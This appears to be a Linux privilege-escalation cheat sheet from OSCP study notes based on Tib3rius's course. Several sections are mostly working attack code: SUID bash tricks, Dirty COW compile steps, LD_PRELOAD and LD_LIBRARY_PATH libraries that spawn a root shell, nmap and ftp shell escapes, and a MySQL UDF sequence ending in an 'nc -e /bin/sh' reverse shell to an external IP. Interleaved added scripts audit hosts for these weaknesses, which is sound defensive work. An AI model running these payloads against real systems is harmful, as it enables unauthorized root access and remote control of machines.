The privilege escalation techniques below come from Tib3rius's course. They are basically never needed in the OSCP exam, but learning them is still quite interesting.
[Tib3rius-linux privilege | Udemy](https://www.udemy.com/course/linux-privilege-escalation/learn/lecture/16964494?start=0#overview)
[Pentest-Cheatsheets/privilege-escalation at master · Tib3rius/Pentest-Cheatsheets · GitHub](https://github.com/Tib3rius/Pentest-Cheatsheets/tree/master/privilege-escalation)
### udf to root
```
udf
https://www.exploit-db.com/exploits/1518
gcc -g -c raptor_udf2.c -o udf_privilege -fPIC -> x64, but there is no need to worry too much about this.
```
### strings suggest
```
strings file
strace -v -f -e execve <command> 2>&1 | grep exec
ltrace command
```
### SUID / SGID - Abuse Shell Feature (Bash < 4.2-048)
When the bash version is < 4.2-048, you can define and export a function to escalate privilege:
```
user@debian:~$ function /etc/rio { /bin/bash -p;}
user@debian:~$ export -f /etc/rio
```
Finally, run the service that calls /etc/rio.
### SUID / SGID - Abuse Shell Features (Bash < 4.4)
```
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p
```
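Added audit helper for the two sections above (not from Tib3rius's course or the original notes): it classifies a bash version string against the two thresholds mentioned, < 4.2-048 (exported functions honoured) and < 4.4 (PS4 expansion under SHELLOPTS=xtrace), so an administrator can tell which hosts still need patching. The function name `bash_export_risk` and every version string in the demo are my own constructed assumptions; it accepts either the first line of `bash --version` or a bare `MAJOR.MINOR.PATCH`.

```shell
#!/bin/sh
# Added example, not part of the original notes. Classifies a bash version
# string against the two thresholds in the notes. Version strings used for
# testing are constructed.

# bash_export_risk VERSION_STRING
# Prints exactly one word:
#   exported-function   version < 4.2 patch 48  (exported functions still honoured)
#   ps4-xtrace          4.2 patch 48 <= version < 4.4  (PS4 still expanded with xtrace)
#   patched             4.4 or later
bash_export_risk() {
    # Strip the "GNU bash, version " prefix, the "(1)-release ..." suffix
    # and any "-rc" style suffix, leaving MAJOR.MINOR[.PATCH].
    v=$(printf '%s' "$1" | sed 's/^GNU bash, version //; s/[(].*//; s/-.*//')
    major=${v%%.*}
    rest=${v#*.}
    [ "$rest" = "$v" ] && rest=0          # no minor component given
    minor=${rest%%.*}
    patch=${rest#*.}
    [ "$patch" = "$rest" ] && patch=0     # no patch component given

    # Fold into one comparable integer: MAJOR*1000000 + MINOR*1000 + PATCH
    n=$((major * 1000000 + minor * 1000 + patch))
    if [ "$n" -lt 4002048 ]; then
        echo exported-function
    elif [ "$n" -lt 4004000 ]; then
        echo ps4-xtrace
    else
        echo patched
    fi
}

# Usage when run as a script: audit the bash installed on this host.
if command -v bash >/dev/null 2>&1; then
    bash_export_risk "$(bash --version 2>/dev/null | head -n 1)"
fi
```

Run it on each host and treat anything other than `patched` as a reason to update bash, or at least to audit which SUID programs and sudo rules invoke a shell.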
### dirty cow
```
good dirtycow -> https://github.com/FireFart/dirtycow
gcc -pthread dirtycow.c -o dirtycow -lcrypt
```
### udf2root
```
https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c
use mysql;
create table trenchesofit(line blob);
insert into trenchesofit values(load_file('/var/www/html/lib_mysqludf_sys_64.so'));
select * from trenchesofit into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('nc -e /bin/sh 192.168.49.130 22');
```
### user files find passwd 2 root
```
/home/user/myvpn.ovpn -> auth-user-pass /etc/openvpn/auth.txt
->root password123
```
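Added example for the case above (my own code, not from the course or the original notes): the root cause there is an OpenVPN config that points `auth-user-pass` at a credential file readable by other users. The function `ovpn_exposed_creds` walks a directory for `*.ovpn` / `*.conf` files, resolves the referenced credential file (relative to the config if needed) and reports it when its world-readable bit is set. Function names, the demo directory layout, the hostname `vpn.example.internal` and the credentials written into the fixtures are all constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original notes. Finds OpenVPN configs whose
# auth-user-pass file is readable by everyone. Demo fixtures are constructed.

# ovpn_exposed_creds DIR
# For each *.ovpn / *.conf under DIR that uses "auth-user-pass FILE", print
#   world-readable FILE (referenced by CONFIG)
# when FILE exists and has the "other" read bit set.
ovpn_exposed_creds() {
    find "$1" -type f \( -name '*.ovpn' -o -name '*.conf' \) 2>/dev/null |
    while IFS= read -r cfg; do
        # second field of the first auth-user-pass line, if any
        cred=$(awk '$1 == "auth-user-pass" && NF >= 2 { print $2; exit }' "$cfg")
        [ -n "$cred" ] || continue
        case "$cred" in
            /*) ;;                                   # already absolute
            *)  cred="$(dirname "$cfg")/$cred" ;;    # relative to the config
        esac
        [ -f "$cred" ] || continue
        # -perm -o=r matches only when others may read the file
        if [ -n "$(find "$cred" -perm -o=r 2>/dev/null)" ]; then
            printf 'world-readable %s (referenced by %s)\n' "$cred" "$cfg"
        fi
    done
}

# Constructed demo: one config with a 0644 credential file (should be
# reported) and one with a 0600 credential file (should not).
demo_ovpn_exposed_creds() {
    d=$(mktemp -d) || return 1
    printf 'client\nremote vpn.example.internal 1194\nauth-user-pass auth.txt\n' > "$d/myvpn.ovpn"
    printf 'vpnuser\nexample-password\n' > "$d/auth.txt"
    chmod 644 "$d/auth.txt"
    printf 'client\nauth-user-pass %s/private.txt\n' "$d" > "$d/other.ovpn"
    printf 'vpnuser\nexample-password\n' > "$d/private.txt"
    chmod 600 "$d/private.txt"
    ovpn_exposed_creds "$d"
    rm -rf "$d"
}
```

Point it at `/home` and `/etc/openvpn` on a real host; any hit is a file to `chmod 600` and, if it holds a reused password, a credential to rotate.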
## sudo2root
```
sudo -l
# list SUID binaries
find / -perm -u=s -type f 2>/dev/null
```
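Added example (not from the course or the original notes) that turns the `find -perm -u=s` one-liner above into a baseline check: `suid_snapshot` lists SUID and SGID files under a directory, and `suid_unexpected` prints whatever a new snapshot contains that the saved baseline does not. Both function names and the baseline/snapshot contents in the demo are constructed; the two extra paths in the demo are the ones this page itself mentions.

```shell
#!/bin/sh
# Added example, not part of the original notes. Baseline/diff check for
# SUID and SGID binaries. Demo path lists are constructed.

# suid_snapshot DIR: sorted, de-duplicated list of SUID or SGID regular
# files under DIR (same predicate as the notes, plus -g=s for SGID).
suid_snapshot() {
    find "$1" -type f \( -perm -u=s -o -perm -g=s \) 2>/dev/null | sort -u
}

# suid_unexpected BASELINE CURRENT
# Both arguments are files holding one path per line. Prints the paths that
# appear in CURRENT but not in BASELINE, one per line, sorted.
suid_unexpected() {
    b=$(mktemp) && c=$(mktemp) || return 1
    sort -u "$1" > "$b"
    sort -u "$2" > "$c"
    comm -13 "$b" "$c"        # lines unique to the second (current) file
    rm -f "$b" "$c"
}

# Constructed demo: a known-good baseline and a later snapshot that has
# gained two SUID files that nobody installed on purpose.
demo_suid_unexpected() {
    base=$(mktemp) && cur=$(mktemp) || return 1
    printf '%s\n' /usr/bin/passwd /usr/bin/sudo /bin/su > "$base"
    printf '%s\n' /usr/bin/passwd /usr/bin/sudo /bin/su \
        /usr/local/bin/suid-env2 /tmp/rootbash > "$cur"
    suid_unexpected "$base" "$cur"
    rm -f "$base" "$cur"
}
```

Save `suid_snapshot / > /var/lib/suid.baseline` on a freshly built host and run `suid_unexpected /var/lib/suid.baseline <(...)`-style comparisons from cron; a SUID copy of a shell under `/tmp` is exactly what the Bash < 4.4 trick above leaves behind.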
### ftp
```
ftp -> ftp !sh
```
### nmap
```
echo 'os.execute("/bin/sh")' > a.nse
nmap --script=a.nse
```
## LD_PRELOAD
```
sudo -l
```
When `find` is listed, write preload.c:
```
#define _GNU_SOURCE      /* needed for the setresuid() declaration */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
/* Runs when the library is loaded; with -nostartfiles this is the init entry point. */
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
```
```
# sudoers must keep the variable through env_reset: Defaults env_reset + Defaults env_keep+=LD_PRELOAD
gcc -fPIC -shared -nostartfiles -o /tmp/a.so preload.c
sudo LD_PRELOAD=/tmp/a.so find   # -> root
```
### LD_LIBRARY_PATH
```
sudoers -> Defaults env_keep+=LD_LIBRARY_PATH
ldd <elf>   # see which shared libraries the target loads
gcc -fPIC -shared -o libcrypt.so.1 library.c
sudo LD_LIBRARY_PATH=. apache2   # apache2 was found to load this library
```
### library.c
```
#define _GNU_SOURCE      /* needed for the setresuid() declaration */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Constructor attribute: runs automatically when the library is loaded. */
static void hijack() __attribute__((constructor));
void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
```
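Added audit helper for both the LD_PRELOAD and LD_LIBRARY_PATH sections (my own code, not from the course or the original notes): both techniques only work because `sudoers` preserves a loader variable through `env_reset`. `sudoers_env_risk` parses a sudoers file and prints every `LD_*` variable that an `env_keep` line keeps, which generalises the two variables on this page to the whole family the dynamic loader reads. The function name and the sample sudoers content in the demo are constructed.

```shell
#!/bin/sh
# Added example, not part of the original notes. Reports loader variables that
# a sudoers file preserves via env_keep. The demo sudoers content is constructed.

# sudoers_env_risk FILE
# Prints, one per line and sorted, every LD_* variable named on an
# "Defaults ... env_keep = ..." or "env_keep += ..." line in FILE.
# Commented-out lines and "env_keep -=" removals are ignored.
sudoers_env_risk() {
    grep -E '^[[:space:]]*Defaults[^#]*env_keep[[:space:]]*\+?=' "$1" 2>/dev/null |
    sed -E 's/^[^#]*env_keep[[:space:]]*\+?=[[:space:]]*//; s/"//g; s/#.*//' |
    tr ' \t,' '\n\n\n' |          # one variable name per line
    grep -E '^LD_' |              # keep only dynamic-loader variables
    sort -u
}

# Constructed demo sudoers: keeps LD_PRELOAD and LD_LIBRARY_PATH, has one
# harmless env_keep line and one commented-out LD_AUDIT line.
demo_sudoers_env_risk() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "LANG LC_ALL"
Defaults        env_keep += "LD_PRELOAD"
Defaults        env_keep+=LD_LIBRARY_PATH   # kept for a legacy apache2 wrapper
# Defaults      env_keep += "LD_AUDIT"
user    ALL=(root) NOPASSWD: /usr/bin/find, /usr/sbin/apache2
EOF
    sudoers_env_risk "$f"
    rm -f "$f"
}
```

Run `sudoers_env_risk /etc/sudoers` (and over `/etc/sudoers.d/*`) as root; any output means a user with any sudo rule at all can run their own code as root, so the `env_keep` entry should go, and `sudo -l` output should be checked for the rule that made it exploitable.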